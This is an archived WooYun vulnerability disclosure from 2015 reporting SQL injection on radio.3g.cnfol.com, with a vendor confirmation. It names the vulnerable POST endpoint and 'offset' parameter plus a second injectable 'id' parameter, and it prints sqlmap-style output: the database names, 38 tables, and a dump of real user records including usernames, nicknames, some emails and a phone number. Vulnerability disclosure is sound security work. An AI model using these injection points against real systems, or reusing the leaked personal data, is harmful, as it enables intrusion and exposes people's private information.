乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-15: 细节已通知厂商并且等待厂商处理中 2015-08-17: 厂商已经确认,细节仅向厂商公开 2015-08-27: 细节向核心白帽子及相关领域专家公开 2015-09-06: 细节向普通白帽子公开 2015-09-16: 细节向实习白帽子公开 2015-10-01: 细节向公众公开
手机+email
post注入
POST /index.php?r=Radiostation/MoreMingjia HTTP/1.1Content-Length: 12Content-Type: application/x-www-form-urlencodedReferer: http://radio.3g.cnfol.com/Host: radio.3g.cnfol.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*offset=1
database management system users privileges:[*] %fol_g3zbrd% [1]: privilege: USAGE
available databases [3]:[*] cnfol_zjcj[*] information_schema[*] test
Database: cnfol_zjcj[38 tables]+---------------------+| Activity || Bl_Install || Bl_Keywords || Bl_Reflex || Bl_UserMobile || Bl_classify || Bl_contentfilter || Bl_resource || Bl_user || GK_AttenList || Invitation || InvitationCode || InvitationExchange || WdtVoice || WdtVoiceCount || backupZjcj_group || bk_blacklist || bk_flower || bk_group || bk_live || bl_con || bl_ref || bl_secret || syslog || tbAppStock || tbUserStockOptional || unscramble || unscramblexx || weidiantai1 || zjcj_androiddevice || zjcj_content || zjcj_content_201507 || zjcj_group || zjcj_iosdevice || zjcj_operate || zjcj_user || zjcj_userchat || zjcj_userjoin |+---------------------+
+-----------------+--------------+-------------+-------------+-------------+--------+| email | userName | userNick | replyNumber | mobile | manage |+-----------------+--------------+-------------+-------------+-------------+--------+| [email protected] | pzpz | pzpz | 0 | <blank> | 1 || <blank> | 5518 | 天顺居士 | 0 | <blank> | 0 || <blank> | woshishui | chaochao | 0 | <blank> | 0 || <blank> | qiyongwei123 | qiyw | 0 | <blank> | 0 || [email protected] | blog | blog1 | 0 | <blank> | 1 || [email protected] | buluo | buluo | 0 | <blank> | 0 || [email protected] | sq | 舒淇 | 0 | <blank> | 0 || [email protected] | ds | 大S | 0 | <blank> | 0 || <blank> | wqh | wqh | 0 | <blank> | 0 || <blank> | kx | 开心果 | 0 | <blank> | 0 || <blank> | ly | 驴行天下1 | 0 | <blank> | 0 || [email protected] | hihi | hihi | 0 | <blank> | 1 || <blank> | ns | 超级女生 | 0 | <blank> | 0 || [email protected] | bdjs | bdjs | 0 | <blank> | 0 || <blank> | syatao | syatao | 0 | <blank> | 0 || [email protected] | sp | 水皮1 | 0 | <blank> | 0 || <blank> | fomu998 | 灯下读贴 | 0 | <blank> | 0 || <blank> | 66236F | 662368 | 0 | <blank> | 0 || <blank> | zzm680920 | 吉利一尘 | 0 | <blank> | 0 || <blank> | gaofenger | gaofenger | 0 | <blank> | 0 || <blank> | jmlu62426 | mingming405 | 0 | <blank> | 0 || <blank> | jack_cchen | jackcchen | 0 | <blank> | 0 || <blank> | aris2370 | aris2370 | 0 | <blank> | 0 || <blank> | tigerhu188 | 金天传奇 | 0 | <blank> | 0 || <blank> | nec511 | 冷 心 | 0 | <blank> | 0 || <blank> | gaoshang99 | gaoshang99 | 0 | <blank> | 0 || <blank> | A9818 | 剑杰8 | 0 | <blank> | 0 || <blank> | lw520165 | saxon鱼 | 0 | <blank> | 0 || <blank> | pigliwu | 中金用户PH | 0 | <blank> | 0 || <blank> | lifhaihe | lftj | 0 | 13821389989 | 0 || <blank> | x46134587 | 温暖梦想 | 0 | <blank> | 0 || <blank> | sabatilla | sabatilla | 0 | <blank> | 0 || <blank> | wgx168 | wgx168 | 0 | <blank> | 0 || <blank> | laoynihao | 逍遥啊鹰 | 0 | <blank> | 0 || <blank> | wwyymm2005 | 肥肥2005 | 0 | <blank> | 0 |
=========================================================另外一处
http://radio.3g.cnfol.com/index-test.php?id=&r=Radiostation/Dragonfly
注入参数id
危害等级:中
漏洞Rank:10
确认时间:2015-08-17 09:20
谢谢,我们会立即处理掉漏洞。
暂无
